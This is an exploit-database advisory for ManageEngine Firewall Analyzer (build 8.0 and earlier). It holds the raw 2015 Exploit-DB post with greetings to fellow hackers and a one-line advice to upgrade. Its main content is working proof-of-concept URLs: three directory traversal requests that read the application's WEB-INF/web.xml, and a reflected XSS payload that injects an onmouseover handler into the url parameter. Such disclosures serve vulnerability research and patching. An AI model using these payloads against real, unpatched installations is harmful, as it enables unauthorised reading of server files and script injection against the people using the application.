ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities

vendor:

Firewall Analyzer

by:

AmirHadi Yazdani (Sobhansys Co)

7.5

CVSS

HIGH

Directory Traversal/XSS

CWE

Product Name: Firewall Analyzer

Affected Version From: <= Build Version 8.0

Affected Version To: <= Build Version 8.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:manageengine:firewall_analyzer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities

ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect, archive, analyze their security device logs and generate forensic reports out of it. Directory Traversal: http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f XSS: http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"

Mitigation:

Upgrade to the latest version of ManageEngine Firewall Analyzer

Source

Exploit-DB raw data:

 ################################################################################################
 #                                                                                              #
 #    ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS  Vulnerabilities::::....   #         
 # #############################################################################################


                                  Sobhan System Network & Security Group (sobhansys)
								      
-------------------------------------------------------
# Date: 2015-01-28
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/firewall/
# Demo Link: http://demo.fwanalyzer.com/
#Affected version: <= Build Version  : 8.0

About ManageEngine Firewall Analyzer (From Vendor Site) :	
								  
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software
that helps network administrators to centrally collect, archive, analyze 
their security device logs and generate forensic reports out of it.
--------------------------------------------------------

									  
I'M hadihadi From Virangar Security Team

special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz

greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei

spl:Z.Khodaee

-------
exploit:

Diretory Traversal :

http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f

XSS :

http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"

----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)

E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net